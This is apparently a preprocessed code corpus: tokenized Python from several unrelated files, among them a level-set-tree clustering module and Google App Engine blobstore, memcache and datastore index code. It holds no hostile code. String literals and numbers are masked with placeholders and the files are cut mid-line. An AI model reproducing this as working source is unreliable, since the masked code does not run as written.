. nodes [ ix ] . start_mass ] , <EOL> [ xpos , self . nodes [ ix ] . end_mass ] ) ) <EOL> return segments , splits , segmap , splitmap <EOL> def _construct_mass_map ( self , ix , start_pile , interval , <EOL> horizontal_spacing ) : <EOL> """<STR_LIT>""" <EOL> size = float ( len ( self . nodes [ ix ] . members ) ) <EOL> children = _np . array ( self . nodes [ ix ] . children ) <EOL> n_child = len ( children ) <EOL> if n_child == <NUM_LIT:0> : <EOL> xpos = _np . mean ( interval ) <EOL> end_pile = start_pile + size / len ( self . density ) <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> segments [ ix ] = ( [ xpos , start_pile ] , [ xpos , end_pile ] ) <EOL> else : <EOL> parent_range = interval [ <NUM_LIT:1> ] - interval [ <NUM_LIT:0> ] <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> census = _np . array ( [ len ( self . nodes [ x ] . members ) for x in children ] , <EOL> dtype = _np . float ) <EOL> weights = census / sum ( census ) <EOL> seniority = _np . argsort ( weights ) [ : : - <NUM_LIT:1> ] <EOL> children = children [ seniority ] <EOL> weights = weights [ seniority ] <EOL> if horizontal_spacing == '<STR_LIT>' : <EOL> child_intervals = _np . cumsum ( weights ) <EOL> child_intervals = _np . insert ( child_intervals , <NUM_LIT:0> , <NUM_LIT:0.0> ) <EOL> else : <EOL> child_intervals = _np . linspace ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , n_child + <NUM_LIT:1> ) <EOL> end_pile = start_pile + ( size - sum ( census ) ) / len ( self . density ) <EOL> for j , child in enumerate ( children ) : <EOL> branch_interval = ( <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j ] * parent_range , <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j + <NUM_LIT:1> ] * parent_range ) <EOL> branch = self . _construct_mass_map ( child , end_pile , <EOL> branch_interval , <EOL> horizontal_spacing ) <EOL> branch_segs , branch_splits , branch_segmap , branch_splitmap = branch <EOL> segmap += branch_segmap <EOL> splitmap += branch_splitmap <EOL> splits = dict ( splits . items ( ) + branch_splits . items ( ) ) <EOL> segments = dict ( segments . items ( ) + branch_segs . items ( ) ) <EOL> children_xpos = _np . array ( [ segments [ k ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] for k in children ] ) <EOL> xpos = _np . mean ( children_xpos ) <EOL> for child in children : <EOL> splitmap . append ( child ) <EOL> child_xpos = segments [ child ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> splits [ child ] = ( [ xpos , end_pile ] , [ child_xpos , end_pile ] ) <EOL> segments [ ix ] = ( [ xpos , start_pile ] , [ xpos , end_pile ] ) <EOL> return segments , splits , segmap , splitmap <EOL> def _mass_to_density ( self , mass ) : <EOL> """<STR_LIT>""" <EOL> density_order = _np . argsort ( self . density ) <EOL> n = len ( self . density ) <EOL> mass_fraction = max ( <NUM_LIT:0> , int ( round ( mass * n ) ) - <NUM_LIT:1> ) <EOL> level_index = density_order [ mass_fraction ] <EOL> level = self . density [ level_index ] <EOL> return level <EOL> def construct_tree ( X , k , prune_threshold = None , num_levels = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> sim_graph , radii = _utl . knn_graph ( X , k , method = '<STR_LIT>' ) <EOL> n , p = X . shape <EOL> density = _utl . knn_density ( radii , n , p , k ) <EOL> tree = construct_tree_from_graph ( adjacency_list = sim_graph , density = density , <EOL> prune_threshold = prune_threshold , <EOL> num_levels = num_levels , verbose = verbose ) <EOL> return tree <EOL> def construct_tree_from_graph ( adjacency_list , density , prune_threshold = None , <EOL> num_levels = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> levels = _utl . define_density_mass_grid ( density , num_levels = num_levels ) <EOL> G = _nx . from_dict_of_lists ( <EOL> { i : neighbors for i , neighbors in enumerate ( adjacency_list ) } ) <EOL> T = LevelSetTree ( density , levels ) <EOL> cc0 = _nx . connected_components ( G ) <EOL> for i , c in enumerate ( cc0 ) : <EOL> T . _subgraphs [ i ] = G . subgraph ( c ) <EOL> T . nodes [ i ] = ConnectedComponent ( <EOL> i , parent = None , children = [ ] , start_level = <NUM_LIT:0.> , end_level = None , <EOL> start_mass = <NUM_LIT:0.> , end_mass = None , members = c ) <EOL> previous_level = <NUM_LIT:0.> <EOL> n = float ( len ( adjacency_list ) ) <EOL> for i , level in enumerate ( levels ) : <EOL> if verbose and i % <NUM_LIT:100> == <NUM_LIT:0> : <EOL> _logging . info ( "<STR_LIT>" . format ( i ) ) <EOL> bg = _np . where ( ( density > previous_level ) & ( density <= level ) ) [ <NUM_LIT:0> ] <EOL> previous_level = level <EOL> old_vcount = sum ( [ x . number_of_nodes ( ) <EOL> for x in T . _subgraphs . itervalues ( ) ] ) <EOL> current_mass = <NUM_LIT:1.> - ( ( old_vcount - len ( bg ) ) / n ) <EOL> deactivate_keys = [ ] <EOL> activate_subgraphs = { } <EOL> for ( k , H ) in T . _subgraphs . iteritems ( ) : <EOL> H . remove_nodes_from ( bg ) <EOL> if H . number_of_nodes ( ) == <NUM_LIT:0> : <EOL> T . nodes [ k ] . end_level = level <EOL> T . nodes [ k ] . end_mass = current_mass <EOL> deactivate_keys . append ( k ) <EOL> else : <EOL> if not _nx . is_connected ( H ) : <EOL> T . nodes [ k ] . end_level = level <EOL> T . nodes [ k ] . end_mass = current_mass <EOL> deactivate_keys . append ( k ) <EOL> cc = _nx . connected_components ( H ) <EOL> for c in cc : <EOL> new_key = max ( T . nodes . keys ( ) ) + <NUM_LIT:1> <EOL> T . nodes [ k ] . children . append ( new_key ) <EOL> activate_subgraphs [ new_key ] = H . subgraph ( c ) <EOL> T . nodes [ new_key ] = ConnectedComponent ( <EOL> new_key , parent = k , children = [ ] , start_level = level , <EOL> end_level = None , start_mass = current_mass , <EOL> end_mass = None , members = c ) <EOL> for k in deactivate_keys : <EOL> del T . _subgraphs [ k ] <EOL> T . _subgraphs . update ( activate_subgraphs ) <EOL> if prune_threshold is not None : <EOL> T = T . prune ( threshold = prune_threshold ) <EOL> return T <EOL> def load_tree ( filename ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename , '<STR_LIT:rb>' ) as f : <EOL> T = _pickle . load ( f ) <EOL> return T </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> from google . appengine . api . api_base_pb import VoidProto <EOL> class BlobstoreServiceError ( ProtocolBuffer . ProtocolMessage ) : <EOL> OK = <NUM_LIT:0> <EOL> INTERNAL_ERROR = <NUM_LIT:1> <EOL> URL_TOO_LONG = <NUM_LIT:2> <EOL> PERMISSION_DENIED = <NUM_LIT:3> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT:OK>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n + <NUM_LIT:0> <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> class CreateUploadURLRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_success_path_ = <NUM_LIT:0> <EOL> success_path_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def success_path ( self ) : return self . success_path_ <EOL> def set_success_path ( self , x ) : <EOL> self . has_success_path_ = <NUM_LIT:1> <EOL> self . success_path_ = x <EOL> def clear_success_path ( self ) : <EOL> if self . has_success_path_ : <EOL> self . has_success_path_ = <NUM_LIT:0> <EOL> self . success_path_ = "<STR_LIT>" <EOL> def has_success_path ( self ) : return self . has_success_path_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_success_path ( ) ) : self . set_success_path ( x . success_path ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_success_path_ != x . has_success_path_ : return <NUM_LIT:0> <EOL> if self . has_success_path_ and self . success_path_ != x . success_path_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_success_path_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . success_path_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def Clear ( self ) : <EOL> self . clear_success_path ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . success_path_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_success_path ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_success_path_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . success_path_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksuccess_path = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> class CreateUploadURLResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_url_ = <NUM_LIT:0> <EOL> url_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def url ( self ) : return self . url_ <EOL> def set_url ( self , x ) : <EOL> self . has_url_ = <NUM_LIT:1> <EOL> self . url_ = x <EOL> def clear_url ( self ) : <EOL> if self . has_url_ : <EOL> self . has_url_ = <NUM_LIT:0> <EOL> self . url_ = "<STR_LIT>" <EOL> def has_url ( self ) : return self . has_url_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_url ( ) ) : self . set_url ( x . url ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_url_ != x . has_url_ : return <NUM_LIT:0> <EOL> if self . has_url_ and self . url_ != x . url_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_url_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . url_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def Clear ( self ) : <EOL> self . clear_url ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . url_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_url ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_url_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . url_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kurl = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:url>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> class DeleteBlobRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . blob_key_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def blob_key_size ( self ) : return len ( self . blob_key_ ) <EOL> def blob_key_list ( self ) : return self . blob_key_ <EOL> def blob_key ( self , i ) : <EOL> return self . blob_key_ [ i ] <EOL> def set_blob_key ( self , i , x ) : <EOL> self . blob_key_ [ i ] = x <EOL> def add_blob_key ( self , x ) : <EOL> self . blob_key_ . append ( x ) <EOL> def clear_blob_key ( self ) : <EOL> self . blob_key_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . blob_key_size ( ) ) : self . add_blob_key ( x . blob_key ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . blob_key_ ) != len ( x . blob_key_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . blob_key_ , x . blob_key_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . blob_key_ ) <EOL> for i in xrange ( len ( self . blob_key_ ) ) : n += self . lengthString ( len ( self . blob_key_ [ i ] ) ) <EOL> return n + <NUM_LIT:0> <EOL> def Clear ( self ) : <EOL> self . clear_blob_key ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . blob_key_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . blob_key_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . add_blob_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . blob_key_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kblob_key = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import time <EOL> from google . appengine . api import apiproxy_stub <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api . memcache import memcache_service_pb <EOL> MemcacheSetResponse = memcache_service_pb . MemcacheSetResponse <EOL> MemcacheSetRequest = memcache_service_pb . MemcacheSetRequest <EOL> MemcacheIncrementRequest = memcache_service_pb . MemcacheIncrementRequest <EOL> MemcacheIncrementResponse = memcache_service_pb . MemcacheIncrementResponse <EOL> MemcacheDeleteResponse = memcache_service_pb . MemcacheDeleteResponse <EOL> class CacheEntry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , expiration , flags , gettime ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( value , basestring ) <EOL> assert len ( value ) <= memcache . MAX_VALUE_SIZE <EOL> assert isinstance ( expiration , ( int , long ) ) <EOL> self . _gettime = gettime <EOL> self . value = value <EOL> self . flags = flags <EOL> self . created_time = self . _gettime ( ) <EOL> self . will_expire = expiration != <NUM_LIT:0> <EOL> self . locked = False <EOL> self . _SetExpiration ( expiration ) <EOL> def _SetExpiration ( self , expiration ) : <EOL> """<STR_LIT>""" <EOL> if expiration > ( <NUM_LIT> * <NUM_LIT:30> ) : <EOL> self . expiration_time = expiration <EOL> else : <EOL> self . expiration_time = self . _gettime ( ) + expiration <EOL> def CheckExpired ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . will_expire and self . _gettime ( ) >= self . expiration_time <EOL> def ExpireAndLock ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . will_expire = True <EOL> self . locked = True <EOL> self . _SetExpiration ( timeout ) <EOL> def CheckLocked ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . locked and not self . CheckExpired ( ) <EOL> class MemcacheServiceStub ( apiproxy_stub . APIProxyStub ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , gettime = time . time , service_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( MemcacheServiceStub , self ) . __init__ ( service_name ) <EOL> self . _gettime = gettime <EOL> self . _ResetStats ( ) <EOL> self . _the_cache = { } <EOL> def _ResetStats ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _hits = <NUM_LIT:0> <EOL> self . _misses = <NUM_LIT:0> <EOL> self . _byte_hits = <NUM_LIT:0> <EOL> self . _cache_creation_time = self . _gettime ( ) <EOL> def _GetKey ( self , namespace , key ) : <EOL> """<STR_LIT>""" <EOL> namespace_dict = self . _the_cache . get ( namespace , None ) <EOL> if namespace_dict is None : <EOL> return None <EOL> entry = namespace_dict . get ( key , None ) <EOL> if entry is None : <EOL> return None <EOL> elif entry . CheckExpired ( ) : <EOL> del namespace_dict [ key ] <EOL> return None <EOL> else : <EOL> return entry <EOL> def _Dynamic_Get ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> keys = set ( request . key_list ( ) ) <EOL> for key in keys : <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None or entry . CheckLocked ( ) : <EOL> self . _misses += <NUM_LIT:1> <EOL> continue <EOL> self . _hits += <NUM_LIT:1> <EOL> self . _byte_hits += len ( entry . value ) <EOL> item = response . add_item ( ) <EOL> item . set_key ( key ) <EOL> item . set_value ( entry . value ) <EOL> item . set_flags ( entry . flags ) <EOL> def _Dynamic_Set ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> set_policy = item . set_policy ( ) <EOL> old_entry = self . _GetKey ( namespace , key ) <EOL> set_status = MemcacheSetResponse . NOT_STORED <EOL> if ( ( set_policy == MemcacheSetRequest . SET ) or <EOL> ( set_policy == MemcacheSetRequest . ADD and old_entry is None ) or <EOL> ( set_policy == MemcacheSetRequest . REPLACE and old_entry is not None ) ) : <EOL> if ( old_entry is None or <EOL> set_policy == MemcacheSetRequest . SET <EOL> or not old_entry . CheckLocked ( ) ) : <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( item . value ( ) , <EOL> item . expiration_time ( ) , <EOL> item . flags ( ) , <EOL> gettime = self . _gettime ) <EOL> set_status = MemcacheSetResponse . STORED <EOL> response . add_set_status ( set_status ) <EOL> def _Dynamic_Delete ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> delete_status = MemcacheDeleteResponse . DELETED <EOL> if entry is None : <EOL> delete_status = MemcacheDeleteResponse . NOT_FOUND <EOL> elif item . delete_time ( ) == <NUM_LIT:0> : <EOL> del self . _the_cache [ namespace ] [ key ] <EOL> else : <EOL> entry . ExpireAndLock ( item . delete_time ( ) ) <EOL> response . add_delete_status ( delete_status ) <EOL> def _internal_increment ( self , namespace , request ) : <EOL> """<STR_LIT>""" <EOL> key = request . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None : <EOL> if not request . has_initial_value ( ) : <EOL> return None <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( str ( request . initial_value ( ) ) , <EOL> expiration = <NUM_LIT:0> , <EOL> flags = <NUM_LIT:0> , <EOL> gettime = self . _gettime ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> assert entry is not None <EOL> try : <EOL> old_value = long ( entry . value ) <EOL> if old_value < <NUM_LIT:0> : <EOL> raise ValueError <EOL> except ValueError : <EOL> logging . error ( '<STR_LIT>' <EOL> '<STR_LIT>' , key ) <EOL> return None <EOL> delta = request . delta ( ) <EOL> if request . direction ( ) == MemcacheIncrementRequest . DECREMENT : <EOL> delta = - delta <EOL> new_value = old_value + delta <EOL> if not ( <NUM_LIT:0> <= new_value < <NUM_LIT:2> ** <NUM_LIT:64> ) : <EOL> new_value = <NUM_LIT:0> <EOL> entry . value = str ( new_value ) <EOL> return new_value <EOL> def _Dynamic_Increment ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> response . set_new_value ( self . _internal_increment ( namespace , request ) ) <EOL> def _Dynamic_BatchIncrement ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for request_item in request . item_list ( ) : <EOL> new_value = self . _internal_increment ( namespace , request_item ) <EOL> item = response . add_item ( ) <EOL> if new_value is None : <EOL> item . set_increment_status ( MemcacheIncrementResponse . NOT_CHANGED ) <EOL> else : <EOL> item . set_increment_status ( MemcacheIncrementResponse . OK ) <EOL> item . set_new_value ( new_value ) <EOL> def _Dynamic_FlushAll ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> self . _the_cache . clear ( ) <EOL> self . _ResetStats ( ) <EOL> def _Dynamic_Stats ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> stats = response . mutable_stats ( ) <EOL> stats . set_hits ( self . _hits ) <EOL> stats . set_misses ( self . _misses ) <EOL> stats . set_byte_hits ( self . _byte_hits ) <EOL> items = <NUM_LIT:0> <EOL> total_bytes = <NUM_LIT:0> <EOL> for namespace in self . _the_cache . itervalues ( ) : <EOL> items += len ( namespace ) <EOL> for entry in namespace . itervalues ( ) : <EOL> total_bytes += len ( entry . value ) <EOL> stats . set_items ( items ) <EOL> stats . set_bytes ( total_bytes ) <EOL> stats . set_oldest_item_age ( self . _gettime ( ) - self . _cache_creation_time ) <EOL> def _Dynamic_GrabTail ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> if request . item_count ( ) <= <NUM_LIT:0> : <EOL> return <EOL> namespace = request . name_space ( ) <EOL> if not namespace : <EOL> return <EOL> namespace_dict = self . _the_cache . get ( namespace , None ) <EOL> if namespace_dict is None : <EOL> return <EOL> items = namespace_dict . items ( ) <EOL> items . sort ( None , lambda ( key , entry ) : entry . created_time ) <EOL> item_count = <NUM_LIT:0> <EOL> for ( key , entry ) in items : <EOL> if entry . CheckExpired ( ) : <EOL> del namespace_dict [ key ] <EOL> elif not entry . CheckLocked ( ) : <EOL> del namespace_dict [ key ] <EOL> item = response . add_item ( ) <EOL> item . set_value ( entry . value ) <EOL> item . set_flags ( entry . flags ) <EOL> item_count += <NUM_LIT:1> <EOL> self . _hits += <NUM_LIT:1> <EOL> self . _byte_hits += len ( entry . value ) <EOL> if item_count == request . item_count ( ) : <EOL> return </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . api import datastore_types <EOL> from google . appengine . api import validation <EOL> from google . appengine . api import yaml_errors <EOL> from google . appengine . api import yaml_object <EOL> from google . appengine . datastore import datastore_pb <EOL> from google . appengine . datastore import entity_pb <EOL> class Property ( validation . Validated ) : <EOL> """<STR_LIT>""" <EOL> ATTRIBUTES = { <EOL> '<STR_LIT:name>' : validation . TYPE_STR , <EOL> '<STR_LIT>' : validation . Options ( ( '<STR_LIT>' , ( '<STR_LIT>' , ) ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , ) ) , <EOL> default = '<STR_LIT>' ) , <EOL> } <EOL> class Index ( validation . Validated ) : <EOL> """<STR_LIT>""" <EOL> ATTRIBUTES = { <EOL> '<STR_LIT>' : validation . TYPE_STR , <EOL> '<STR_LIT>' : validation . Type ( bool , default = False ) , <EOL> '<STR_LIT>' : validation . Optional ( validation . Repeated ( Property ) ) , <EOL> } <EOL> class IndexDefinitions ( validation . Validated ) : <EOL> """<STR_LIT>""" <EOL> ATTRIBUTES = { <EOL> '<STR_LIT>' : validation . Optional ( validation . Repeated ( Index ) ) , <EOL> } <EOL> def ParseIndexDefinitions ( document ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return yaml_object . BuildSingleObject ( IndexDefinitions , document ) <EOL> except yaml_errors . EmptyConfigurationFile : <EOL> return None <EOL> def ParseMultipleIndexDefinitions ( document ) : <EOL> """<STR_LIT>""" <EOL> return yaml_object . BuildObjects ( IndexDefinitions , document ) <EOL> def IndexDefinitionsToKeys ( indexes ) : <EOL> """<STR_LIT>""" <EOL> keyset = set ( ) <EOL> if indexes is not None : <EOL> if indexes . indexes : <EOL> for index in indexes . indexes : <EOL> keyset . add ( IndexToKey ( index ) ) <EOL> return keyset <EOL> def IndexToKey ( index ) : <EOL> """<STR_LIT>""" <EOL> props = [ ] <EOL> if index . properties is not None : <EOL> for prop in index . properties : <EOL> if prop . direction == '<STR_LIT>' : <EOL> direction = ASCENDING <EOL> else : <EOL> direction = DESCENDING <EOL> props . append ( ( prop . name , direction ) ) <EOL> return index . kind , index . ancestor , tuple ( props ) <EOL> ASCENDING = datastore_pb . Query_Order . ASCENDING <EOL> DESCENDING = datastore_pb . Query_Order . DESCENDING <EOL> EQUALITY_OPERATORS = set ( ( datastore_pb . Query_Filter . EQUAL , <EOL> ) ) <EOL> INEQUALITY_OPERATORS = set ( ( datastore_pb . Query_Filter . LESS_THAN , 